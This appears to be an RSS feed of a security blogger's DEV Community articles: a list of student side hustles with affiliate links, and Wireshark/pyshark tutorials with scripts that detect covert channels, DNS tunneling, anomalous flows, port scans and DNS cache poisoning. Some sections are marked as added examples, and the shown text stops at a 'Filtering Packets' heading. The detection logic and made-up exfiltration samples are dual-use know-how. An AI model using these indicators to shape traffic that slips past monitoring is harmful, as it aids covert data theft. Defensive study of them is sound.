<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: William Baptist</title>
    <description>The latest articles on DEV Community by William Baptist (@baptistsec).</description>
    <link>https://dev.to/baptistsec</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1079854%2F45a9cbbe-5f4f-45b3-a0c8-635d5205f33e.jpg</url>
      <title>DEV Community: William Baptist</title>
      <link>https://dev.to/baptistsec</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/baptistsec"/>
    <language>en</language>
    <item>
      <title>5 Fun Side Hustles for Cybersecurity Students</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Sun, 04 Jun 2023 20:28:35 +0000</pubDate>
      <link>https://dev.to/baptistsec/fun-cybersecurity-side-hustles-for-students-85g</link>
      <guid>https://dev.to/baptistsec/fun-cybersecurity-side-hustles-for-students-85g</guid>
      <description>&lt;p&gt;So many online resources seem to be vastly outdated when it comes to side hustles, especially for students. I want to show practical ways that I’ve personally used in the past few months that worked for me and will work for you. What’s great is that all of these can be a learning experience alongside being a fun way to make money.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Building and Selling Cybersecurity Tools
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Income: $100–$500 per month&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I’ve been developing and selling my own cybersecurity tools extensively. You’ll be surprised how many businesses are willing to pay for customised solutions to meet their specific problems.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AmMzRpROqEjg5oqRDV4L6HQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AmMzRpROqEjg5oqRDV4L6HQ.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Identify a need within the market and develop a tool to meet it. This requires strong programming skills and a good understanding of cybersecurity. Once you’ve developed your tool, you can sell it on platforms like &lt;a href="https://github.com/marketplace" rel="noopener noreferrer"&gt;GitHub Marketplace&lt;/a&gt;, or directly to businesses.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Web Hosting Security Consultant
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Income: $100–$1000+ per month&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Now for this method I’m going to use &lt;a href="https://go.fiverr.com/visit/?bta=740228&amp;amp;brand=fiverraffiliates" rel="noopener noreferrer"&gt;Fiverr&lt;/a&gt; as an example because that was the site I used, but you can use any number of other online freelance websites or even try hosting your own site!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AtLUvOVvxDFHzSgUZoJok9w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AtLUvOVvxDFHzSgUZoJok9w.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The key to this is to offer your services to a niche area of web hosting. For example, I offered setup services in SSL certificates for websites. I also would offer hosting as an option that was bundled with the SSL certificates.&lt;/p&gt;

&lt;p&gt;There are two platforms that helped me achieve this, named &lt;a href="http://ssls.sjv.io/AWm0Nx" rel="noopener noreferrer"&gt;SSLs.com&lt;/a&gt; and &lt;a href="http://skystra.sjv.io/homepage" rel="noopener noreferrer"&gt;Skystra&lt;/a&gt;, with the former being the main source of income. I gained the skills in my first year of college for choosing the correct SSL certificate and setting it up for the client (naturally charging extra for the setup fee).&lt;/p&gt;

&lt;p&gt;Skystra allowed me to scale what I needed by charging monthly so I would recommend looking into the best options for your hustle.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. Security eCommerce
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Income: $100–$10,000+ per month&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Let’s be honest, traditional dropshipping sucks in 2023, but it doesn’t mean you can’t take advantage of that concept.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F3260%2F1%2AakpUogkxSwKk6NslgdRugg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F3260%2F1%2AakpUogkxSwKk6NslgdRugg.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You can try your hand at creating a custom platform or a mobile app that caters to a niche market and integrate it with &lt;a href="http://easyship.ilbqy6.net/deal" rel="noopener noreferrer"&gt;Easyship&lt;/a&gt; for seamless fulfillment. For example, you could make an e-commerce platform for physical security goods that are tailored to computers (encrypted USBs, webcam covers etc.).&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Online Cybersecurity Tutoring
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Income: $200–$1000+ per month&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;As you know there is a high demand for cybersecurity knowledge and many people are looking for tutors to help them grasp complex cybersecurity concepts.&lt;/p&gt;

&lt;p&gt;Join online tutoring platforms like &lt;a href="https://www.chegg.com/" rel="noopener noreferrer"&gt;Chegg&lt;/a&gt; and &lt;a href="https://www.tutor.com/" rel="noopener noreferrer"&gt;Tutor.com&lt;/a&gt;. To be an effective tutor, it’s best if you already have a good grasp of cybersecurity principles, patience, and excellent communication skills.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Writing Cybersecurity Articles
&lt;/h2&gt;

&lt;p&gt;&lt;em&gt;Income: $0–$200 per month&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Finally, this is one I do a lot and the key to it is fun!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AKdXj5TdUD4ncvBoMxpHwhg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AKdXj5TdUD4ncvBoMxpHwhg.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It’s less of a side hustle, but to me there is nothing better than sharing cool tools within articles about cybersecurity. It also looks really good on your resume if you are actively engaging with and contributing to the cybersecurity community.&lt;/p&gt;

&lt;p&gt;Get noticed, get inspired and check out &lt;a href="https://dev.to/williambaptist"&gt;my profile&lt;/a&gt; and see if you can spot some more articles you might like!&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>productivity</category>
      <category>career</category>
    </item>
    <item>
      <title>Advanced Wireshark Scripts for Intrusion Detection</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Sun, 14 May 2023 19:14:38 +0000</pubDate>
      <link>https://dev.to/baptistsec/powerful-wireshark-scripts-for-easy-intrusion-detection-6pe</link>
      <guid>https://dev.to/baptistsec/powerful-wireshark-scripts-for-easy-intrusion-detection-6pe</guid>
      <description>&lt;p&gt;In this article, I have delved into the depths of Wireshark scripting once again and discovered some unconventional techniques to unravel hidden threats and identify suspicious activities. &lt;/p&gt;

&lt;h2&gt;
  
  
  Revealing Covert Channels:
&lt;/h2&gt;

&lt;p&gt;Covert channels are stealthy communication paths that bypass traditional security measures. To expose these hidden channels, you can leverage Wireshark scripting and Python’s flexibility. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The following script looks for a known marker string at the start of HTTP bodies; swap in whatever indicator you are hunting for:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Open the captured packets file, keeping only packets that carry a reassembled HTTP body
cap = pyshark.FileCapture("packets.pcapng", display_filter="http.file_data")

# Detect suspicious covert channels by matching a known marker at the start of the body
for pkt in cap:
    payload = pkt.http.get_field_value("file_data")
    if payload and payload.startswith("CovertChannel"):
        print(f"Covert Channel Detected in frame {pkt.number}: {payload[:80]}")

cap.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AiHAORro-HSR-iuJTknTx9w.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AiHAORro-HSR-iuJTknTx9w.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;By matching the body of each HTTP message against a marker, the script identifies a covert channel that employs a known keyword or pattern. This only catches channels whose indicator you already know: a channel that hides in header ordering, request timing or an unusual encoding will never match a fixed string, which is where the statistical approach further down comes in.&lt;/p&gt;

&lt;h2&gt;
  
  
  Uncovering DNS Tunneling:
&lt;/h2&gt;

&lt;p&gt;DNS tunneling is a technique used to bypass network security by encapsulating data within DNS requests and responses. Let’s shed light on these covert channels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The following script identifies potential DNS tunnels:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Open the captured packets file, keeping only DNS queries (responses repeat the name anyway)
cap = pyshark.FileCapture("packets.pcapng", display_filter="dns.flags.response == 0")

# Detect potential DNS tunnels: dns.qry.name is the name in the question section
for pkt in cap:
    qname = str(pkt.dns.qry_name).lower()
    if "tunnel" in qname:
        print(f"Potential DNS Tunnel Detected: {qname}")

cap.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;By reading the requested domain name from each query, you can pinpoint queries that match a known indicator. Real tunnels do not announce themselves in the name, though. The better indicators are unusually long labels, labels that look like base32 or base64 output, a large number of distinct subdomains under one parent domain, and a high share of TXT or NULL queries, so treat a keyword match as a starting point rather than an early warning system.&lt;/p&gt;
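&lt;p&gt;Since a tunnel will not put the word “tunnel” in its names, here is an added example (my code, not from the original article) that scores query names on the indicators a practitioner actually uses: the length of the longest label, the Shannon entropy of that label, and the number of distinct subdomains under one registered domain, so it goes beyond the single keyword check above. It runs on a constructed list of query names; the domain exfil-test.net and its base32-looking labels are made up for the demonstration, and the “last two labels” rule for the registered domain is a simplification of the public suffix list. To run it against a capture, feed it the values of pkt.dns.qry_name instead of SAMPLE_QUERIES.&lt;/p&gt;

```python
import math
from collections import defaultdict

# Constructed query names, not from a real capture: ordinary lookups plus six
# base32-looking labels under the made-up domain exfil-test.net.
SAMPLE_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "cdn.example.com",
    "www.example.com",
    "mfrggzdfmztwq2lknnwg23tpobyxe43uojsxgzlt.data.exfil-test.net",
    "onswy3dpfqqho33snrscc4tdmfzgkzbnmy2gc3q.data.exfil-test.net",
    "krugkidrovuwg2zamjzg653oebzgmzbnnfxg.data.exfil-test.net",
    "nbswy3dpeb3w64tmmqqho33snruwk4ttmfzgkzq.data.exfil-test.net",
    "ovsxm3dbnrudg5lsmvwwk3tuebsxg4tzmf2gk3q.data.exfil-test.net",
    "mzxw6ytboi3e4lbuebsxg5dfon2gk3lfmzwa.data.exfil-test.net",
]


def shannon_entropy(label):
    """Bits per character. Ordinary host names score around 2-3; base32/base64 data climbs past 3.5."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Last two labels; a production tool would consult the public suffix list (co.uk etc.)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def score_query(qname, max_label_len=30, min_entropy=3.5):
    """Per-query indicators that fire for this name, in a fixed order."""
    hits = []
    longest = max(qname.rstrip(".").split("."), key=len)
    if len(longest) > max_label_len:
        hits.append("long-label")
    if shannon_entropy(longest) > min_entropy:
        hits.append("high-entropy")
    return hits


def find_tunnel_domains(qnames, min_unique=5):
    """Aggregate per registered domain: a tunnel needs many distinct, encoded-looking
    subdomains under one parent, which separates it from a single odd-looking CDN host name.
    Returns {domain: {"unique": distinct names seen, "flagged": names with indicators}}."""
    per_domain = defaultdict(lambda: {"unique": set(), "flagged": 0})
    for q in qnames:
        entry = per_domain[registered_domain(q)]
        entry["unique"].add(q.lower())
        if score_query(q):
            entry["flagged"] += 1
    return {
        d: {"unique": len(e["unique"]), "flagged": e["flagged"]}
        for d, e in per_domain.items()
        if len(e["unique"]) >= min_unique and e["flagged"] >= min_unique
    }


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(f"{q}: {score_query(q) or 'ok'}")
    print(find_tunnel_domains(SAMPLE_QUERIES))
```

&lt;p&gt;The per-domain aggregation is the part that keeps false positives down: one long, random-looking label is normal for CDNs and tracking pixels, whereas dozens of distinct encoded labels under the same parent within a short time are not.&lt;/p&gt;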

&lt;h2&gt;
  
  
  Utilising Statistical Anomaly Detection:
&lt;/h2&gt;

&lt;p&gt;Intrusion detection can be enhanced by leveraging statistical anomaly detection techniques. Wireshark scripting, combined with Python’s statistical libraries, can help us identify deviations from normal network behavior. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Consider the following script that applies anomaly detection to packet sizes:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark
import numpy as np
from scipy.stats import zscore

# Open the captured packets file
cap = pyshark.FileCapture("packets.pcapng")

# Extract frame sizes (pkt.length is the captured frame length in bytes)
packet_sizes = [int(pkt.length) for pkt in cap]
cap.close()

# Detect anomalous packet sizes: a z-score above 3 means more than three standard
# deviations from the mean frame size of this capture
z_scores = zscore(packet_sizes)
anomalies = np.where(z_scores &amp;gt; 3)[0]

if len(anomalies) &amp;gt; 0:
    # np.where returns zero-based indexes; Wireshark numbers frames from 1
    print("Anomalous Packet Sizes Detected in frames:", [int(i) + 1 for i in anomalies])
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;By calculating z-scores for packet sizes and comparing them to a threshold, the script identifies packets that deviate significantly from the expected range, and prints their frame numbers so you can jump to them in Wireshark. Two caveats before you rely on it: frame sizes are capped by the link MTU (1514 bytes on plain Ethernet), so the distribution is bounded and nowhere near normal; and with n samples no z-score can exceed √(n−1) when the population standard deviation is used, which is scipy’s default, so a threshold of 3 cannot fire at all on fewer than ten packets. Aggregating bytes per flow rather than per packet, and using a robust statistic, gives a more useful signal.&lt;/p&gt;
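&lt;p&gt;Because a single large flow is dragged into the mean and standard deviation it is supposed to stand out from, the added example below (my code, not from the original article) aggregates bytes per flow and scores the flows with a median/MAD modified z-score alongside the classic mean/std one, in pure Python so it runs without numpy or scipy. The packet records are constructed for the demonstration and use documentation-range addresses; one host pushing about 80 KB to 203.0.113.9 is missed by the classic score (with only five flows that score cannot exceed 2) but is obvious in the robust one.&lt;/p&gt;

```python
import statistics
from collections import defaultdict

# Constructed packet records (src, dst, dst_port, frame bytes), not from a real capture.
# Most flows are small; 10.0.0.3 pushes 60 full-size frames to one outside host.
SAMPLE_PACKETS = [
    ("10.0.0.5", "198.51.100.10", 443, 517),
    ("10.0.0.5", "198.51.100.10", 443, 1380),
    ("10.0.0.5", "198.51.100.10", 443, 1380),
    ("10.0.0.7", "198.51.100.10", 443, 517),
    ("10.0.0.7", "198.51.100.10", 443, 1380),
    ("10.0.0.9", "172.16.0.20", 445, 1024),
    ("10.0.0.9", "172.16.0.20", 445, 1024),
    ("10.0.0.12", "192.0.2.53", 53, 74),
    ("10.0.0.12", "192.0.2.53", 53, 90),
] + [("10.0.0.3", "203.0.113.9", 443, 1380)] * 60


def flow_bytes(packets):
    """Sum frame bytes per (src, dst, dst_port) flow."""
    totals = defaultdict(int)
    for src, dst, dport, size in packets:
        totals[(src, dst, dport)] += size
    return dict(totals)


def classic_z_scores(values):
    """Mean/std z-scores with the population std, the default of scipy.stats.zscore.
    With n values no score can exceed sqrt(n - 1), so small samples never reach 3."""
    mean = statistics.fmean(values)
    std = statistics.pstdev(values)
    if std == 0:
        return [0.0 for _ in values]
    return [(v - mean) / std for v in values]


def robust_z_scores(values):
    """Modified z-score from the median and the median absolute deviation (MAD), scaled
    by 0.6745 so it is comparable to a normal z-score. One huge outlier barely moves
    the median or the MAD, so it cannot hide itself the way it does in the classic score."""
    med = statistics.median(values)
    mad = statistics.median(abs(v - med) for v in values)
    if mad == 0:
        # at least half the flows sit exactly on the median; only larger flows matter here
        return [float("inf") if v > med else 0.0 for v in values]
    return [0.6745 * (v - med) / mad for v in values]


def anomalous_flows(packets, threshold=3.5):
    """Return {flow: bytes} for flows whose robust z-score exceeds the threshold
    (3.5 is the customary cut-off for the modified z-score)."""
    totals = flow_bytes(packets)
    flows = list(totals)
    scores = robust_z_scores([totals[f] for f in flows])
    return {f: totals[f] for f, z in zip(flows, scores) if z > threshold}


if __name__ == "__main__":
    totals = flow_bytes(SAMPLE_PACKETS)
    sizes = list(totals.values())
    for flow, classic, robust in zip(totals, classic_z_scores(sizes), robust_z_scores(sizes)):
        print(f"{flow}: {totals[flow]} bytes, z={classic:.2f}, robust z={robust:.2f}")
    print("anomalous:", anomalous_flows(SAMPLE_PACKETS))
```

&lt;p&gt;To use it on a capture, build the records from pkt.ip.src, pkt.ip.dst, pkt.tcp.dstport (or pkt.udp.dstport) and int(pkt.length); the flow key is deliberately coarse so that retransmissions and multiple connections to the same service land in one bucket.&lt;/p&gt;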

&lt;h2&gt;
  
  
  Port Scan Detector:
&lt;/h2&gt;

&lt;p&gt;A port scan detector is essential for network security, as it helps identify unauthorised scanning activity. By spotting a scan early, administrators learn which hosts an attacker is probing and can check those systems for exposed services before the follow-up.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This script counts how many distinct ports each source has tried to open on each target:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark
from collections import defaultdict

# Open the captured packets file, keeping only connection attempts (SYN set, ACK clear);
# a scan is a burst of these, whereas an established flow is mostly ACK packets
cap = pyshark.FileCapture("packets.pcapng",
                          display_filter="tcp.flags.syn == 1 and tcp.flags.ack == 0")

# Track port scanning activities: distinct destination ports probed per (source, target) pair
probed_ports = defaultdict(set)

# Detect port scans
for pkt in cap:
    if "IP" not in pkt:   # skip IPv6 frames, which carry no ip layer
        continue
    probed_ports[(pkt.ip.src, pkt.ip.dst)].add(pkt.tcp.dstport)

cap.close()

# Identify potential port scanning activities
for (src_ip, dst_ip), ports in probed_ports.items():
    if len(ports) &amp;gt; 5:  # Adjust the threshold as per your needs
        print(f"Possible Port Scanning Detected: {src_ip} --&amp;gt; {dst_ip} ({len(ports)} ports probed)")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2A4SVY249aoK6uKhTrxr0itw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2A4SVY249aoK6uKhTrxr0itw.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The display filter keeps only packets with SYN set and ACK clear, that is, connection attempts, so the many packets of an established session never reach the counter. For every (source, destination) pair the script collects the set of distinct destination ports that were probed, and a pair whose set grows past the threshold is reported as a port scan. Counting repeated packets on a single source-port/destination-port pair would instead flag every normal connection, since any TCP session exchanges far more than five packets.&lt;/p&gt;
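&lt;p&gt;As an added example that is not part of the original article, the detector below generalises the per-pair idea: it groups connection attempts per source into time windows and separates a vertical scan (many ports on one host) from a horizontal sweep (one port across many hosts), and it ignores SYN-ACK replies so that a server answering a scanner is not itself flagged. The records are constructed for the demonstration; with a real capture you would build them from pkt.sniff_timestamp, pkt.ip.src, pkt.ip.dst, pkt.tcp.dstport and the SYN/ACK flag bits.&lt;/p&gt;

```python
from collections import defaultdict

# Constructed TCP records (timestamp in seconds, src, dst, dst_port, flags), not a real capture.
# 10.0.0.50 sweeps 25 ports on one host, the target 10.0.0.10 answers with SYN-ACKs,
# 10.0.0.60 probes port 22 across a /24, and 10.0.0.5 opens a few normal connections.
SAMPLE_RECORDS = (
    [(1.0 + i * 0.01, "10.0.0.50", "10.0.0.10", 1 + i, "S") for i in range(25)]
    + [(1.005 + i * 0.01, "10.0.0.10", "10.0.0.50", 40000 + i, "SA") for i in range(25)]
    + [(5.0 + i * 0.02, "10.0.0.60", f"10.0.1.{i}", 22, "S") for i in range(1, 21)]
    + [(9.0, "10.0.0.5", "10.0.0.10", 443, "S"), (9.5, "10.0.0.5", "10.0.0.10", 443, "S"),
       (10.0, "10.0.0.5", "10.0.0.11", 80, "S")]
)


def detect_scans(records, window=10.0, port_threshold=15, host_threshold=15):
    """Group pure SYNs per source into fixed time windows and report vertical scans
    (many ports on one host) and horizontal sweeps (one port on many hosts).
    A scan straddling a window boundary is split across two windows; use a sliding
    window or lower thresholds if slow scans matter for your traffic."""
    ports_per_target = defaultdict(set)   # (src, window, dst)   -> ports probed
    hosts_per_port = defaultdict(set)     # (src, window, dport) -> hosts probed
    for ts, src, dst, dport, flags in records:
        if flags != "S":                  # only connection attempts; SYN-ACK replies are not probes
            continue
        bucket = int(ts // window)
        ports_per_target[(src, bucket, dst)].add(dport)
        hosts_per_port[(src, bucket, dport)].add(dst)

    alerts = []
    for (src, bucket, dst), ports in ports_per_target.items():
        if len(ports) >= port_threshold:
            alerts.append({"type": "vertical", "src": src, "target": dst, "count": len(ports)})
    for (src, bucket, dport), hosts in hosts_per_port.items():
        if len(hosts) >= host_threshold:
            alerts.append({"type": "horizontal", "src": src, "port": dport, "count": len(hosts)})
    return alerts


if __name__ == "__main__":
    for alert in detect_scans(SAMPLE_RECORDS):
        print(alert)
```

&lt;p&gt;Thresholds of 15 in a 10-second window are a reasonable starting point for a small network; a vulnerability scanner or a load balancer health check will trip them legitimately, so keep an allow-list of known scanners.&lt;/p&gt;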

&lt;h2&gt;
  
  
  Exposing  DNS Cache Poisoning Attacks:
&lt;/h2&gt;

&lt;p&gt;A network’s DNS infrastructure is critical: a cache poisoning attack plants a forged record in a resolver’s cache so that it hands out incorrect responses, redirecting users to malicious hosts, allowing their communications to be intercepted, or compromising their data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The script below looks for the two traces a poisoning attempt leaves in a capture, responses nobody asked for and responses that contradict each other for the same query, so that the resolver’s answers can be trusted:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Open the captured packets file, keeping only DNS traffic
cap = pyshark.FileCapture("packets.pcapng", display_filter="dns")

# Outstanding queries keyed by (client, transaction id, name), mapped to the answers seen so far
outstanding = {}
poisoning_attempts = []

# Detect DNS cache poisoning attacks: a forged response either matches no query (the attacker
# is guessing transaction IDs) or contradicts the genuine response to the same query
for pkt in cap:
    if "IP" not in pkt:
        continue
    dns = pkt.dns
    key_base = (str(dns.id), str(dns.qry_name).lower())
    if str(dns.flags_response) in ("0", "False"):
        # Query: remember who asked and under which transaction ID
        outstanding[(pkt.ip.src,) + key_base] = None
        continue
    key = (pkt.ip.dst,) + key_base
    if key not in outstanding:
        poisoning_attempts.append(f"unsolicited response for {key_base[1]} (txid {key_base[0]}) from {pkt.ip.src}")
        continue
    # Response matches a query: compare its A records with any earlier matching response
    answers = tuple(sorted(f.show for f in dns.a.all_fields)) if hasattr(dns, "a") else ()
    if outstanding[key] is None:
        outstanding[key] = answers
    elif outstanding[key] != answers:
        poisoning_attempts.append(f"conflicting answers for {key_base[1]}: {outstanding[key]} vs {answers}")

cap.close()

# Display the identified DNS cache poisoning attempts
if poisoning_attempts:
    print("Detected DNS Cache Poisoning Attempts:")
    for attempt in poisoning_attempts:
        print(attempt)
else:
    print("No DNS Cache Poisoning Attempts Detected.")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The script keeps a table of outstanding queries keyed by the client address, the 16-bit transaction ID and the name asked for. A response that matches no entry was never requested: an off-path attacker who has to guess the transaction ID produces exactly such unsolicited responses, usually in large numbers. A response that matches an entry but carries different A records from an earlier matching response means two parties answered the same question differently, which is what a won race looks like on the wire. For this to work the capture must see both the queries and the responses, so capture on the resolver’s client-facing side. Note that requests of type ANY are not a poisoning signal on their own; they are associated with DNS amplification attacks, and many resolvers now answer them minimally (RFC 8482).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Finally, the script displays the identified DNS cache poisoning attempts, or a message indicating that no attempts were detected leaving the following result:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AVhMH1QX1q2tj-N2IpciMaw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn-images-1.medium.com%2Fmax%2F2000%2F1%2AVhMH1QX1q2tj-N2IpciMaw.png" alt="Your Network is Healthy :)"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Detecting hidden communication within seemingly harmless network traffic allows us to expose activity that would otherwise go unnoticed. I hope that you found some use from these scripts, and remember that you will need to tune the filters and thresholds extensively to get value from them on your own network!&lt;/p&gt;

</description>
      <category>tutorial</category>
      <category>python</category>
      <category>cybersecurity</category>
      <category>beginners</category>
    </item>
    <item>
      <title>Simple Wireshark Scripts for Easy Network Forensics</title>
      <dc:creator>William Baptist</dc:creator>
      <pubDate>Thu, 11 May 2023 19:20:08 +0000</pubDate>
      <link>https://dev.to/baptistsec/simple-wireshark-scripts-for-easy-network-forensics-1ij1</link>
      <guid>https://dev.to/baptistsec/simple-wireshark-scripts-for-easy-network-forensics-1ij1</guid>
      <description>&lt;p&gt;In this article, I’ll show you some practical Python code snippets to simplify network forensics.&lt;/p&gt;

&lt;h2&gt;
  
  
  Capturing Packets:
&lt;/h2&gt;

&lt;p&gt;With the help of the pyshark library, which drives Wireshark’s command-line tool tshark (so Wireshark must be installed and tshark on your PATH), the script can grab packets that match a filter and save them for further analysis.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;To install pyshark, type in the terminal:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pip install pyshark
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Then take a look at this code snippet:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Capture TCP packets on eth0 and let tshark write them straight to a file.
# Capturing needs root or capture privileges; bpf_filter is a capture filter,
# applied before packets are stored, so the file only ever contains TCP.
capture = pyshark.LiveCapture(interface='eth0', bpf_filter='tcp', output_file='packets.pcap')

# Start capturing packets; sniff() returns once the timeout (seconds) has elapsed
capture.sniff(timeout=10)
capture.close()

print(f"Captured {len(capture)} packets to packets.pcap")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Analysing Packets:
&lt;/h2&gt;

&lt;p&gt;Now that the packets are captured, let’s analyse them with the next script. Pyshark provides a straightforward way to extract valuable information from captured packets.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Check out this example that extracts the source and destination IP addresses of TCP packets:&lt;/strong&gt;&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pyshark

# Open the packets file
cap = pyshark.FileCapture("packets.pcap")

# Extract source and destination IP addresses of TCP packets
for pkt in cap:
    # TCP over IPv6 has no "ip" layer, so check for it before accessing pkt.ip
    if "TCP" in pkt and "IP" in pkt:
        print(f"Source IP: {pkt.ip.src}, Destination IP: {pkt.ip.dst}")

cap.close()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Filtering Packets:
